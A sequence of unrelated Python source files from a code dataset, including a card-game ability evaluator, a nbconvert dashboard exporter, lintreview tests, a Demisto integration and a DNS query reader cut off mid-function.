effectivenessTrans(target, atk, health):\n if isMyCard(target._ingameID):\n if target.getHealth() > health or target.getAttack() > atk:\n return Effectivness.GOOD\n else:\n return Effectivness.WORSE\n else:\n if target.getHealth() < health or target.getAttack() < atk:\n return Effectivness.GOOD\n else:\n return Effectivness.WORSE\n \ndef effectivnessGain(txt):\n if 'this turn':\n return Effectivness.GOOD\n else:\n return Effectivness.GREAT\n \ndef effectivnessRet(target):\n if isMyCard(target._ingameID):\n if target.getDamage()/target.getHealth() <= 0.5 and target._charge == True:\n return Effectivness.GREAT\n elif target.getDamage()/target.getHealth() <= 0.5:\n return Effectivness.GOOD\n elif target._charge == True:\n return Effectivness.GOOD\n else:\n if target._getAttack >= 4:\n return Effectivness.GOOD\n else:\n return Effectivness.LOW\n #vielleicht zusaetzlich ob die karte effective is\n\ndef effectivnessDsty(target):\n if isMyCard(target._ingameId):\n return Effectivness.WORSE\n else:\n return Effectivness.GREAT\n \ndef toHero(value, effect):\n hero = [c for c in getMyCards().values() if c._cardtype == Cardtype.HERO]\n if effect == Effect.DMG:\n return (effectivnessDmg(hero, value), 1)\n if effect == Effect.RES:\n return (effectivnessRes(hero, value), 1)\n #zurueckschreiben\n \ndef toEnemyHero(value, effect):\n hero = [c for c in getEnemyCards().values() if c._cardtype == Cardtype.HERO]\n if effect == Effect.DMG:\n return (effectivnessDmg(hero, value), 1)\n if effect == Effect.RES:\n return (effectivnessRes(hero, value), 1)\n #zurueckschreiben \n\ndef toAllEnemyMinions(value, effect):\n e = 0\n targets = [c for c in getEnemyCards().values() if (c._zone == Zone.PLAY and c._cardtype == Cardtype.MINION)]\n if Effect.DMG == effect:\n for t in targets:\n e = e + effectivnessDmg(t, value)\n return (e, len(targets))\n if Effect.RES == effect:\n for t in targets:\n e = e + effectivnessRes(t, value)\n return (e, len(targets))\n\ndef toAllMyMinions(value, effect):\n 
e = -1\n targets = [c for c in getMyCards().values() if (c._zone == Zone.PLAY and c._cardtype == Cardtype.MINION)]\n if Effect.DMG == effect:\n for t in targets:\n e = e + effectivnessDmg(t, value)\n return (e, len(targets))\n if Effect.RES == effect:\n for t in targets:\n e = e + effectivnessRes(t, value)\n return (e, len(targets))\n \ndef toAllEnemyChars(value, effect):\n e1 = toAllEnemyMinions(value, effect)\n e2 = toEnemyHero(value, effect)\n return (e1[0] + e2[0], e1[1] + e2[1])\n\ndef toEachHero(value, effect):\n e1 = toEnemyHero(value, effect)\n e2 = toHero(value, effect)\n return (e1[0] + e2[0], e1[1] + e2[1])\n \ndef toAllMinions(value, effect):\n e1 = toAllEnemyMinions(value, effect)\n e2 = toAllMyMinions(value, effect)\n return (e1[0] + e2[0], e1[1] + e2[1])\n\ndef toALL(value, effect):\n e1 = toEachHero(value, effect)\n e2 = toAllMinions(value, effect)\n return (e1[0] + e2[0], e1[1] + e2[1])\n \ndef toAllOthers(card, value, effect):\n e = 0\n e1 = toAllEnemyChars(value, effect)\n e2 = toHero(value, effect) \n targets = [c for c in getMyCards().values() if (c._zone == Zone.PLAY and c._cardtype == Cardtype.MINION and not c._ingameID == card._ingameID)]\n if Effect.DMG == effect:\n for t in targets:\n e = e + effectivnessDmg(t, value)\n return (e + e1[0] + e2[0], len(targets) + e1[1] + e2[1])\n \ndef getAdjacent(target):\n targets = []\n if isMyCard(target._ingameID):\n for c in getMyCards().values():\n if not c._zonePos == 0:\n if (c._zonePos == target._zonePos - 1) or (c._zonePos == target._zonePos + 1):\n targets.append(c)\n else:\n for c in getEnemyCards().values():\n if not c._zonePos == 0:\n if (c._zonePos == target._zonePos - 1) or (c._zonePos == target._zonePos + 1):\n targets.append(c)\n return targets\n\ndef toAdjacent(value, effect, target):\n e = 0\n targets = getAdjacent(target)\n if Effect.DMG == effect:\n for t in targets:\n e = e + effectivnessDmg(t, value)\n return (e, len(targets))\n \n \ndef dmg(card, target):\n txt = card._text\n amount = 0\n effness = None\n sideEffnes = (0, 0)\n if 'Deal' in txt:\n amount = split(txt, 'Deal ', ' damage')\n elif 'deal' in txt:\n amount = split(txt, 'deal ', ' damage')\n try:\n if '-' in amount:\n mini, maxi = amount.split('-')\n amount = (int(mini) + int(maxi)) // 2 # average of a 'min-max' damage range\n else:\n amount = int(amount)\n if 'and' in txt:\n second = txt.split('and')[1]\n if E_HERO in second:\n sideEffnes = toEnemyHero(amount, Effect.DMG)\n elif 'damage' in second:\n new_amount = int(second.split('damage')[0])\n if Target.ADJACENT in second:\n sideEffnes = toAdjacent(new_amount, Effect.DMG, target)\n if 'all other enemies' in second:\n amount = amount - new_amount\n sideEffnes = toAllEnemyChars(new_amount, Effect.DMG)\n effness = (effectivnessDmg(target, amount) + sideEffnes[0], 1 + sideEffnes[1])\n except:\n amount = None\n if target is None and type(amount) is IntType:\n if Target.HERO in txt:\n effness = toHero(amount, Effect.DMG)\n elif Target.MINIONS in txt:\n effness = toAllMinions(amount, Effect.DMG)\n elif Target.E_MINIONS in txt:\n effness = toAllEnemyMinions(amount, Effect.DMG)\n elif Target.E_HERO in txt:\n effness = toEnemyHero(amount, Effect.DMG)\n elif Target.ALL in txt:\n effness = toALL(amount, Effect.DMG)\n elif Target.ENEMIES in txt:\n effness = toAllEnemyChars(amount, Effect.DMG)\n elif Target.OTHER in txt:\n effness = toAllOthers(card, amount, Effect.DMG)\n elif Target.HEROS in txt:\n effness = toEachHero(amount, Effect.DMG) # 'Heros' cards hit both heroes\n elif Target.MINION in txt:\n pass\n elif Target.RANDOM in txt:\n pass\n return effness\n \n\ndef draw(card):\n txt = card._text\n amount = 0\n if 'Draw' in txt:\n amount = split(txt, 'Draw ', ' card')\n elif 'draw' in txt:\n amount = split(txt, 'draw ', ' card')\n if amount == 'a':\n amount = 1\n else:\n try:\n amount = int(amount)\n except:\n amount = None\n if amount is None:\n return (Effectivness.LOW, 1) # draw amount could not be parsed\n h_count = getMyHandcardCount()\n if h_count + amount > 10:\n return (Effectivness.WORSE, 1)\n elif h_count + amount == 10:\n return (Effectivness.LOW, 1)\n elif h_count <= 5:\n if amount > 1:\n return (Effectivness.GREAT, 1)\n else:\n return (Effectivness.GOOD, 1)\n else:\n return (Effectivness.GOOD, 1) # hand still has room\n \ndef summon(card):\n txt = card._text\n atk = 0\n m_count = getMyMinionCount()\n if 'summon' in txt:\n atk = split(txt, 'summon ', '/') \n elif 'Summon' in txt:\n atk = split(txt, 'Summon ', '/')\n amount, atk = atk.split(' ')\n #hlt = split(txt, '/', ' ')\n if amount == 'a':\n amount = 1\n elif amount == 'two':\n amount = 2\n elif amount == 'three':\n amount = 3\n else:\n try:\n amount = int(amount) # plain numeric amounts like '2'\n except:\n amount = 1\n if 'opponent' in txt:\n return (Effectivness.BAD, 1)\n elif amount + m_count > 7:\n return (Effectivness.WORSE, 1)\n elif amount + m_count == 7:\n return (Effectivness.BAD, 1)\n elif amount + m_count < 7 and not m_count == 0:\n return (Effectivness.GOOD, 1)\n elif m_count == 0:\n return (Effectivness.GREAT, 1)\n \ndef discard():\n return (Effectivness.BAD, 1)\n\ndef add():\n return (Effectivness.GOOD, 1)\n\ndef restore(card, target):\n txt = card._text\n amount = 0\n effness = None\n if 'full Health' in txt:\n amount = 99\n elif 'Restore' in txt:\n amount = int(split(txt, 'Restore ', 'Health'))\n elif 'restore' in txt:\n amount = int(split(txt, 'restore ', 'Health'))\n else:\n return (Effectivness.LOW, 1)\n if target is None:\n if Target.HERO in txt:\n effness = toHero(amount, Effect.RES)\n elif Target.MINIONS in txt:\n effness = toAllMinions(amount, Effect.RES)\n elif Target.ALL in txt:\n effness = toALL(amount, Effect.RES)\n else:\n effness = (effectivnessRes(target, amount), 1)\n if effness is None:\n return Effectivness.LOW # no recognised restore target in the card text\n return int(effness[0]/effness[1])\n \ndef equip(card):\n for c in getMyCards().values():\n if c.compareCardtype(Cardtype.WEAPON) and c.compareZone(Zone.PLAY):\n return (Effectivness.BAD, 1)\n return (Effectivness.GOOD, 1)\n\ndef transform(card, target):\n txt = card._text\n if 'Transform' in txt:\n if 'random' in txt:\n pass\n else:\n atk, hlt = txt.split('/')\n return effectivenessTrans(target, int(atk.split('a ')[-1]), int(hlt.split(' ')[0])) # last token before the '/' is the attack value\n\ndef gain(card):\n txt = card._text\n if 'Mana Crystal' in txt:\n return effectivnessGain(txt)\n elif 'Attack' in txt:\n return effectivnessGain(txt)\n elif 'Health' in txt:\n return effectivnessGain(txt)\n elif 'Armor' in txt:\n return (Effectivness.GOOD, 1)\n elif '/' in txt:\n return effectivnessGain(txt) \n elif 'Stealth' in txt or 'Divine Shield' in txt:\n return (Effectivness.GOOD, 1) \n return (Effectivness.LOW, 1) # no recognised gain effect\n\ndef returnToHand(card, target):\n txt = card._text\n if Target.MINIONS in txt:\n if getEnemyMinionCount() - getMyMinionCount() > 0 and MinionDmg() - EnemyAttackPower() > 0:\n return (Effectivness.GREAT, 1)\n elif MinionDmg() - EnemyAttackPower() > 0:\n return (Effectivness.GOOD, 1)\n elif 'to life' in txt:\n if 'with 1 Health' in txt:\n return (Effectivness.GOOD, 1)\n elif 'with full Health' in txt and target.getDamage()/target.getHealth() < 0.5:\n return (Effectivness.GREAT, 1)\n else:\n return (Effectivness.LOW, 1)\n else:\n return effectivnessRet(target)\n \ndef enrage(card):\n if card.getHealth() > 1:\n return (Effectivness.GOOD, 1)\n else:\n return (Effectivness.BAD, 1)\n\ndef cost(card): \n txt = card._text\n if 'cost' in txt:\n try:\n red = int(split(txt,'(', ')'))\n if 'less' in txt:\n if 'Your' in txt:\n if red == 0:\n return (Effectivness.GREAT, 1)\n else:\n return (Effectivness.GOOD, 1)\n elif 'Enemy' in txt:\n return (Effectivness.BAD, 1)\n elif 'more' in txt:\n if 'Your' in txt:\n return (Effectivness.BAD, 1)\n elif 'Enemy' in txt:\n return (Effectivness.GOOD, 1)\n except:\n return (Effectivness.LOW, 1)\n \ndef destroy(card, target):\n txt = card._text\n if target is None:\n if Target.MINIONS in txt:\n if getMyMinionCount() - getEnemyMinionCount() < 0:\n return (Effectivness.GOOD, 1)\n else:\n return (Effectivness.BAD, 1)\n elif Target.OTHER in txt:\n return (Effectivness.GOOD, 1)\n else:\n if isMyCard(target._ingameID):\n return (Effectivness.WORSE, 1)\n else:\n return (Effectivness.GREAT, 1) \n \ndef generell(card):\n effnes = 0\n effnes = effnes + (card._attack - card._manacosts) + (card._health - card._manacosts)\n if effnes < 0:\n return (Effectivness.BAD, 1)\n elif effnes > 0:\n return (Effectivness.GOOD, 1)\n else:\n return (Effectivness.LOW, 1)\n \ndef isDefensiveCard(card, targets): \n if card.compareCardtype(Cardtype.SPELL) or card.compareCardtype(Cardtype.MINION):\n target = None\n if 'Give' in card._text and ('Taunt' in card._text or 'Divine Shield' in card._text) and not getMyMinionCount() == 0:\n return True\n elif 'Restore' in card._text or 'restore' in card._text:\n if targets is not None:\n eff = None\n for t in targets:\n t = getCardByIngameId(t)\n e = restore(card, t) \n if eff is None or e > eff:\n eff = e\n target = t \n \n else:\n eff = restore(card, None)\n elif 'Gain' in card._text and 'Armor' in card._text:\n eff = gain(card)\n elif card.compareCardtype(Cardtype.MINION):\n eff = generell(card)\n if targets is not None:\n high = None\n for t in targets:\n t = getCardByIngameId(t)\n e = effectivness(card, t) \n if high is None or e > high:\n high = e\n target = t \n else:\n high = effectivness(card, None)\n eff = (eff[0] + high[0])/(eff[1] + high[1])\n if card._taunt:\n eff = eff + 0.5\n if card._divineShield:\n eff = eff + 0.5\n eff = round(eff, 0)\n if eff >= Effectivness.GOOD:\n return (True, target)\n return (False, None)\n \ndef attackEffectivness(attacker, target):\n a_l = attacker.getHealth() - target.getAttack()\n t_l = target.getHealth() - attacker.getAttack()\n if a_l > 0 and t_l <= 0:\n return Effectivness.GOOD\n elif a_l <= 0 and t_l <= 0:\n return Effectivness.LOW\n elif a_l <= 0 and t_l > 0:\n return Effectivness.BAD\n elif target.getHealth() == t_l and target._divineShield:\n return Effectivness.LOW\n elif t_l == target.getHealth():\n return Effectivness.WORSE\n elif a_l == attacker.getHealth():\n return Effectivness.GREAT\n \ndef singleThread(card):\n hero = getMyHero()\n percent = card.getAttack()/(hero._health - hero._armor)\n if percent == 0:\n return ThreatLvl.NONE\n elif percent > 0.2:\n return ThreatLvl.HIGH\n elif percent > 0.13:\n return ThreatLvl.INCREASED\n elif percent > 0.05:\n return ThreatLvl.NORMAL\n else:\n return ThreatLvl.LOW\n\ndef eff_weapon():\n weapon = [c for c in getMyCards().values() if c.compareCardtype(Cardtype.WEAPON) and c.compareZone(Zone.PLAY)]\n if len(weapon) == 0:\n return Effectivness.GOOD\n else:\n return Effectivness.WORSE\n \n \ndef effectivness(card, target):\n txt = card._text\n e = (0, 0)\n if card.compareZone(Zone.HAND):\n if 'Damage' in txt or 'damage' in txt:\n v = dmg(card, target)\n e = (e[0] + v[0], e[1] + v[1]) \n elif 'Destroy' in txt or 'destroy' in txt:\n v = destroy(card, target)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'cost' in 
txt:\n v = cost(card)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Enrage' in txt:\n v = enrage(card)#\n e = (e[0] + v[0], e[1] + v[1])\n elif 'return' in txt or 'Return' in txt:\n v = returnToHand(card, target)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'gain' in txt or 'Gain' in txt:\n v = gain(card)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Transform' in txt or 'transform' in txt:\n v = transform(card, target)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Equip' in txt or 'equip' in txt:\n v = equip(card)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Restore' in txt or 'restore' in txt:\n v = restore(card, target)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Add' in txt or 'add' in txt:\n v = add()\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Discard' in txt or 'discard' in txt:\n v = discard()\n e = (e[0] + v[0], e[1] + v[1])\n elif 'summon' in txt or 'Summon' in txt:\n v = summon(card)\n e = (e[0] + v[0], e[1] + v[1])\n elif 'Draw' in txt or 'draw' in txt:\n v = draw(card)\n e = (e[0] + v[0], e[1] + v[1])\n return round(e[0]/e[1], 0)\n elif card.compareZone(Zone.PLAY):\n return attackEffectivness(card, target)","sub_path":"Bachelor/Ba/AbilityInterpreter.py","file_name":"AbilityInterpreter.py","file_ext":"py","file_size_in_byte":19743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"500051329","text":"# This file contains the information about the model\n\n# Set Hidden Input Knots\nhi_knots = [1,3]\n\n# Define Parameters of the model as a list\n\nparameters = {\t'a1' : 0.1 , \n\t\t'a2' : 0.1 ,\n\t\t'a3' : 0.1 ,\n 'a4' : 0.1 ,\n\t\t'b1' : 0.2 ,\n\t\t'b2' : 0.2 ,\n\t\t'b3' : 0.2 ,\n 'b4' : 0.2 ,\n\n\t\t'alpha1': 0.1, # L1 regularisation\n\t\t'alpha2': 0.1 # L2 regularisation\n}\n\n# Declare variables and inital values\n\nvariables = { \t'x1' : 1 , \n\t\t'x2' : 0.01 , \n\t\t'x3' : 0.01 ,\n 'x4' : 0.01\n}\n\n# Define System equations (dx1 abbrev. dx1/dt )\n\nequations = {\t'dx1' : '-a1 * x1 + b4 * x4' ,\n\t\t'dx2' : '-a2 * x2 + b1 * x1' ,\n\t\t'dx3' : '-a3 * x3 + b2 * x2' ,\n 'dx4' : '-a4 * x4 + b3 * x3'\n}\n\n# Define Observables\n\nobservables = { 'y1' : 'x1 + x2 + 2*x3' ,\n\t\t'y2' : 'x2 + 2 * x3' ,\n 'y3' : 'x3'\n} \n\n","sub_path":"APMonitor/Template/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"140433440","text":"# A very elegant solution introduced by https://leetcode.com/problems/largest-rectangle-in-histogram/discuss/28917/AC-Python-clean-solution-using-stack-76ms\n# The explanation to this algorithm: https://www.youtube.com/watch?v=VNbkzsnllsU \nclass Solution(object):\n def largestRectangleArea(self, heights):\n \"\"\"\n :type heights: List[int]\n :rtype: int\n \"\"\"\n stack = [-1]\n heights += [0]\n res = 0\n for i in range(len(heights)):\n while heights[i] < heights[stack[-1]]:\n current_index = stack.pop(-1)\n length = i - stack[-1] - 1\n height = heights[current_index]\n res = max(res, height * length)\n stack.append(i)\n return res","sub_path":"84. Largest Rectangle in Histogram/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"443676711","text":"\nimport argparse\nimport queue\nimport database\nimport hotspot\n\n\ntasks = []\n\ndef init_tasks(hostnames):\n \"\"\" Initializes all hotspot tasks in parallel. 
\"\"\"\n global tasks\n for hostname in hostnames:\n task = {}\n task[\"hostname\"] = hostname\n task[\"queue\"] = queue.Queue()\n task[\"hotspot\"] = hotspot.Hotspot(hostname, task[\"queue\"])\n task[\"hotspot\"].start()\n tasks.append(task)\n\ndef join_tasks():\n global tasks\n for task in tasks:\n task[\"hotspot\"].join()\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"database\", help=\"Hotspot database file.\")\n args = parser.parse_args()\n\n db = database.Database(args.database)\n hostnames = db.get_hostnames()\n\n init_tasks(hostnames)\n for task in tasks:\n task[\"queue\"].put(\"quit\")\n join_tasks()\n","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"277648788","text":"import os\nimport os.path\n\nimport jinja2\nfrom nbconvert.exporters.html import HTMLExporter\n\n\n@jinja2.contextfunction\ndef include_template(ctx, name):\n \"\"\"Include a file relative to this file\n \"\"\"\n env = ctx.environment\n return jinja2.Markup(env.loader.get_source(env, name)[0])\n\n\n@jinja2.contextfunction\ndef include_external_file(ctx, name):\n \"\"\"Include an encoded base64 image\n \"\"\"\n with open(os.path.abspath(name), \"r\") as f:\n content = f.read()\n return jinja2.Markup(content)\n\n\n@jinja2.contextfunction\ndef include_external_base64_img(ctx, name):\n \"\"\"Include an encoded base64 image\n \"\"\"\n import base64\n\n with open(os.path.abspath(name), \"rb\") as f:\n encoded_string = base64.b64encode(f.read())\n return jinja2.Markup(encoded_string.decode())\n\n\nclass NBConvertFlexExporter(HTMLExporter):\n\n # \"File -> Download as\" menu in the notebook\n export_from_notebook = \"Flex Dashboard\"\n\n extra_loaders = [jinja2.PackageLoader(__name__, \"\")]\n\n @property\n def template_path(self):\n \"\"\"\n Append nbconvert_templates to the default HTML ones we are extending\n \"\"\"\n return super().template_path + [\n os.path.join(os.path.dirname(__file__), \"nbconvert_templates\")\n ]\n\n def _template_file_default(self):\n \"\"\"\n We want to use the new template we ship with our library.\n \"\"\"\n return \"nbconvert\" # full\n\n def __init__(self, *args, **kwargs):\n super(HTMLExporter, self).__init__(*args, **kwargs)\n self.environment.globals[\"include_template\"] = include_template\n self.environment.globals[\"include_external_file\"] = include_external_file\n self.environment.globals[\n \"include_external_base64_img\"\n ] = include_external_base64_img\n\n def default_filters(self):\n for pair in super(HTMLExporter, self).default_filters():\n yield pair\n yield (\"test_filter\", self.test_filter)\n\n def test_filter(self, text):\n return \"test_filter: \" + text\n","sub_path":"jupyter_flex/nbconvert_exporter.py","file_name":"nbconvert_exporter.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"565742792","text":"import demistomock as demisto\nfrom CommonServerPython import *\nfrom CommonServerUserPython import *\n''' IMPORTS '''\n\nimport json\n\n\ndef test_module():\n \"\"\"\n returning 'ok' indicates that the integration works like it is supposed to. 
Connection to the service is successful.\n \"\"\"\n return 'ok'\n\n\ndef fetch_incidents(last_run):\n \"\"\"\n This function will execute every 1 minute.\n\n :return: next_run, list of incidents that will be created in Demisto\n \"\"\"\n # Get the last fetch time, if exists\n last_fetch = last_run.get('last_fetch')\n\n # Handle first time fetch\n if last_fetch is None:\n last_fetch = 0\n\n incidents = [\n {\n 'name': f'Hello incident {last_fetch + 1}',\n 'rawJSON': json.dumps({\n 'hello': 'world'\n })\n },\n {\n 'name': f'Hello incident {last_fetch + 2}',\n 'rawJSON': json.dumps({\n 'hello': 'world'\n })\n }\n ]\n\n next_run = {'last_fetch': last_fetch + 2}\n return next_run, incidents\n\n\ndef say_hello_command(args):\n name = args.get('name')\n\n return f'## Hello {name}'\n\n\ndef main():\n try:\n if demisto.command() == 'test-module':\n result = test_module()\n demisto.results(result)\n\n if demisto.command() == 'helloworldsimple-say-hello':\n results = say_hello_command(demisto.args())\n return_outputs(readable_output=results, outputs=None)\n\n if demisto.command() == 'fetch-incidents':\n next_run, incidents = fetch_incidents(demisto.getLastRun())\n demisto.setLastRun(next_run)\n demisto.incidents(incidents)\n\n except Exception as e:\n return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}')\n\n\nif __name__ in ('__main__', '__builtin__', 'builtins'):\n main()\n","sub_path":"Integrations/HelloWorldSimple/HelloWorldSimple.py","file_name":"HelloWorldSimple.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"293963523","text":"from __future__ import absolute_import\nimport os\nimport lintreview.fixers as fixers\nfrom lintreview.diff import parse_diff, Diff\nfrom lintreview.tools.phpcs import Phpcs\nfrom lintreview.utils import composer_exists\nfrom unittest import skipIf\nfrom mock import Mock\nfrom nose.tools import (\n assert_raises,\n assert_in,\n eq_,\n with_setup\n)\nfrom .. 
import load_fixture, fixtures_path\nfrom ..test_git import setup_repo, teardown_repo, clone_path\n\n\nphpcs_missing = not(composer_exists('phpcs'))\n\n\ndef test_run_fixers():\n # Test that fixers are executed if fixer is enabled\n mock_tool = Mock()\n mock_tool.has_fixer.return_value = True\n files = ['diff/adjacent_original.txt']\n\n out = fixers.run_fixers([mock_tool], fixtures_path, files)\n eq_(1, mock_tool.execute_fixer.call_count)\n eq_(0, len(out))\n\n\ndef test_run_fixers__no_fixer_mode():\n # Test that fixers are skipped when has_fixer fails\n # Test that fixers are executed if fixer is enabled\n mock_tool = Mock()\n mock_tool.has_fixer.return_value = False\n files = ['diff/adjacent_original.txt']\n\n out = fixers.run_fixers([mock_tool], fixtures_path, files)\n eq_(0, mock_tool.execute_fixer.call_count)\n eq_(0, len(out))\n\n\n@skipIf(phpcs_missing, 'Needs phpcs')\n@with_setup(setup_repo, teardown_repo)\ndef test_run_fixers__integration():\n # Test fixer integration with phpcs.\n tail_path = 'tests/fixtures/phpcs/has_errors.php'\n file_path = os.path.abspath(clone_path + '/' + tail_path)\n phpcs = Phpcs(Mock(), {'fixer': True})\n\n diff = fixers.run_fixers([phpcs], clone_path, [file_path])\n eq_(1, len(diff))\n eq_(tail_path, diff[0].filename)\n\n\ndef test_find_intersecting_diffs():\n original = load_fixture('diff/intersecting_hunks_original.txt')\n updated = load_fixture('diff/intersecting_hunks_updated.txt')\n original = parse_diff(original)\n updated = parse_diff(updated)\n result = fixers.find_intersecting_diffs(original, updated)\n\n eq_(1, len(result))\n assert isinstance(result[0], Diff)\n eq_('model.php', result[0].filename)\n eq_('00000', result[0].commit)\n\n\ndef test_find_intersecting_diffs__no_intersect():\n original = load_fixture('diff/intersecting_hunks_original.txt')\n updated = load_fixture('diff/adjacent_original.txt')\n original = parse_diff(original)\n updated = parse_diff(updated)\n result = fixers.find_intersecting_diffs(original, updated)\n\n eq_(0, len(result))\n\n\ndef test_apply_fixer_diff__missing_strategy_key():\n original = Mock()\n changed = Mock()\n context = {}\n with assert_raises(fixers.StrategyError) as err:\n fixers.apply_fixer_diff(original, changed, context)\n assert_in('Missing', str(err.exception))\n\n\ndef test_apply_fixer_diff__invalid_strategy():\n original = Mock()\n changed = Mock()\n context = {'strategy': 'bad stategy'}\n with assert_raises(fixers.StrategyError) as err:\n fixers.apply_fixer_diff(original, changed, context)\n assert_in('Unknown', str(err.exception))\n\n\ndef test_apply_fixer_diff__missing_strategy_context():\n original = Mock()\n changed = Mock()\n context = {'strategy': 'commit'}\n with assert_raises(fixers.StrategyError) as err:\n fixers.apply_fixer_diff(original, changed, context)\n assert_in('Could not create strategy', str(err.exception))\n\n\ndef test_apply_fixer_diff__strategy_execution_fails():\n strategy_factory = Mock()\n strategy = Mock()\n strategy.execute.side_effect = RuntimeError\n strategy_factory.return_value = strategy\n\n fixers.add_strategy('mock', strategy_factory)\n\n original = load_fixture('diff/intersecting_hunks_original.txt')\n updated = load_fixture('diff/intersecting_hunks_updated.txt')\n original = parse_diff(original)\n updated = parse_diff(updated)\n\n context = {'strategy': 'mock'}\n out = fixers.apply_fixer_diff(original, updated, context)\n eq_(1, strategy.execute.call_count)\n eq_(out, None, 'No output and no exception')\n\n\ndef test_apply_fixer_diff__calls_execute():\n 
strategy_factory = Mock()\n strategy = Mock()\n strategy_factory.return_value = strategy\n\n fixers.add_strategy('mock', strategy_factory)\n\n original = load_fixture('diff/intersecting_hunks_original.txt')\n updated = load_fixture('diff/intersecting_hunks_updated.txt')\n original = parse_diff(original)\n updated = parse_diff(updated)\n\n context = {'strategy': 'mock'}\n fixers.apply_fixer_diff(original, updated, context)\n eq_(1, strategy.execute.call_count)\n","sub_path":"tests/fixers/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"226379986","text":"#!/usr/local/bin/python3\n\nimport argparse\nimport socket\nimport sys\nfrom enum import Enum\nfrom contextlib import contextmanager\nimport random\n\nDNS_SERVER = \"8.8.8.8\"\n\n\nclass DomainType(Enum):\n A = 1\n CNAME = 5\n NULL = 10\n PTR = 12\n MX = 15\n TXT = 16\n AAAA = 28\n\n\nclass DNSAnswer(object):\n\n SKIP_BYTES = 12\n\n @staticmethod\n def handle_ip4(packet, start):\n length = DNSAnswer.read_length(packet, start)\n start = start + DNSAnswer.SKIP_BYTES\n\n ip = packet[start: start + length]\n return \".\".join([str(x) for x in ip])\n\n @staticmethod\n def handle_ip6(packet, start):\n length = DNSAnswer.read_length(packet, start)\n start = start + DNSAnswer.SKIP_BYTES\n\n ip = packet[start: start + length]\n result = \"\"\n for i, num in enumerate(ip):\n result += format(num, '02x')\n if i % 2 != 0:\n result += \":\"\n return result[:-1]\n\n @staticmethod\n def handle_mx(packet, start):\n start = start + DNSAnswer.SKIP_BYTES\n preference = packet[start+1]\n\n server = DNSAnswer._handle_mx(packet, start+2)\n return \".\".join(server)\n\n @staticmethod\n def _handle_mx(packet, start):\n current = start + 1\n length = packet[start]\n\n sections = []\n\n while length != 0 and length != 192:\n sections.append(packet[current:current+length].decode('ISO-8859-1'))\n current, length = current+length+1, packet[current+length]\n\n if length == 192:\n follow = DNSAnswer._handle_mx(packet, packet[current])\n sections.extend(follow)\n\n return sections\n\n\n @staticmethod\n def handle_cname(packet, start):\n start = start + DNSAnswer.SKIP_BYTES\n\n server = DNSAnswer._handle_mx(packet, start)\n return \".\".join(server)\n\n @staticmethod\n def handle_txt(packet, start):\n length = DNSAnswer.read_length(packet, start)\n start = start + DNSAnswer.SKIP_BYTES\n return packet[start:start+length].decode('ISO-8859-1')\n\n @staticmethod\n def read_length(packet, start):\n return packet[start + DNSAnswer.SKIP_BYTES - 1]\n\n\nHANDLERS = {\n DomainType.A: DNSAnswer.handle_ip4,\n DomainType.AAAA: DNSAnswer.handle_ip6,\n DomainType.MX: DNSAnswer.handle_mx,\n DomainType.CNAME: DNSAnswer.handle_cname,\n DomainType.TXT: DNSAnswer.handle_txt,\n DomainType.PTR: DNSAnswer.handle_cname\n}\n\n\nclass DNSReader(object):\n def __init__(self, hostname, dns=DNS_SERVER, reverse=False):\n if reverse:\n hostname = \".\".join(hostname.split(\".\")[::-1])\n hostname = hostname + \".in-addr.arpa\"\n\n self.hostname = hostname\n self.dns = dns\n self.reverse = reverse\n self.id = [random.randint(0, 255), random.randint(0, 255)]\n self.header = self.id + [1, 0, 0, 1, 0, 0, 0, 0, 0, 0]\n self.queries = []\n\n def add_query(self, type):\n if self.reverse and type != DomainType.PTR:\n log_error(Errors.NON_PTR)\n self.queries.append(self._generate_query(type))\n\n @property\n def requests(self):\n for query in self.queries:\n yield 
bytes(self.header + query)\n\n @property\n def answers(self):\n answers = {}\n\n for response in self.query(self.dns):\n for type, answer in self.scan(response):\n answer_item = answers.get(type, set())\n answers[type] = answer_item.union([answer])\n\n return answers\n\n def query(self, dns_server=DNS_SERVER):\n with open_socket(dns_server, 53) as socket:\n for request in self.requests:\n socket.sendall(request)\n reply = socket.recv(4096)\n\n yield bytearray(reply)\n\n def scan(self, response):\n if self.id != [response[0], response[1]]:\n log_error(Errors.DNS_ID_ERROR)\n\n options = convert_binary(response[2])\n options += convert_binary(response[3])\n\n if options[0] != 1:\n log_error(Errors.NON_RESPONSE_ERROR)\n\n query_count = response[5]\n answer_count = response[7]\n authority_count = response[9]\n additional_count = response[11]\n\n start = 16 + len(self._encode_hostname(self.hostname))\n offset = start\n for answer in range(answer_count):\n length = DNSAnswer.read_length(response, offset)\n yield self.scan_answer(response, offset)\n offset += length + 12\n\n def scan_answer(self, response, start):\n type = DomainType(response[start + 3])\n\n handler = HANDLERS.get(type, lambda x, y: None)\n result = handler(response, start)\n\n return type, result\n\n def _generate_query(self, type):\n query = self._encode_hostname(self.hostname)\n query.extend([0, type.value])\n query.extend([0, 1])\n return query\n\n @staticmethod\n def _encode_hostname(hostname):\n parts = hostname.split(\".\")\n\n bytes = []\n for part in parts:\n 